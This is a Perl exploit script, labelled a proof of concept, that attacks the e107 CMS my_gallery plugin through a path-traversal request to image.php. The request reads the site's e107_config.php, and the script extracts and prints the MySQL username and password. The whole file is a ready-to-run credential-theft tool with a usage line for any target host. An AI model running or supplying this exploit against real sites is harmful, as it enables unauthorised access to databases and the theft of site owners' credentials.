#!/usr/bin/perl

#-----------------------------------------------------#
#     usage :                                         #
#     root@noge:~# perl e107.pl www.localhost.com     #
#-----------------------------------------------------#

# Proof of Concept (PoC) - BEGIN !!!

use HTTP::Request;
use LWP::UserAgent;

my $web  = $ARGV[0];
my $vuln = "/e107_plugins/my_gallery/image.php?file=";

print "\n 4e107 Plugin my_gallery LFD Exploit\n";
print " 12Found by NoGe - Coded by Vrs-hCk\n";

if (@ARGV != 1) { &help; exit(1) }

sub help(){
	print "\n [LFI] Use : perl $0 <target>\n";
}

if ($web =~ /http:\/\// ) { $target = $web."/"; } else { $target = "http://".$web."/"; }

my $exploitx  = $target.$vuln."../../e107_config.php";
print "\n [~] Exploiting $target ...\n\n";
my $request   = HTTP::Request->new(GET=>$exploitx);
my $useragent = LWP::UserAgent->new();
$useragent->timeout(10);
my $response  = $useragent->request($request);
if ($response->is_success) {
	my $res   = $response->as_string;
	if ($res =~ m/mySQLuser      = '(.*)'/g) {
		print "\n [~] DB Username: $1\n";
	}
	if ($res =~ m/mySQLpassword  = '(.*)'/g) {
		print " [~] DB Password: $1\n\n";
	}
	if ($res !~ /mySQLuser/) {
		print " [!] Failed !!!\n\n";
	}
}
else { print " [!] Error, ".$response->status_line.".\n\n"; }

# (C) Coded by Vrs-hCk

# Proof of Concept (PoC) - END !!!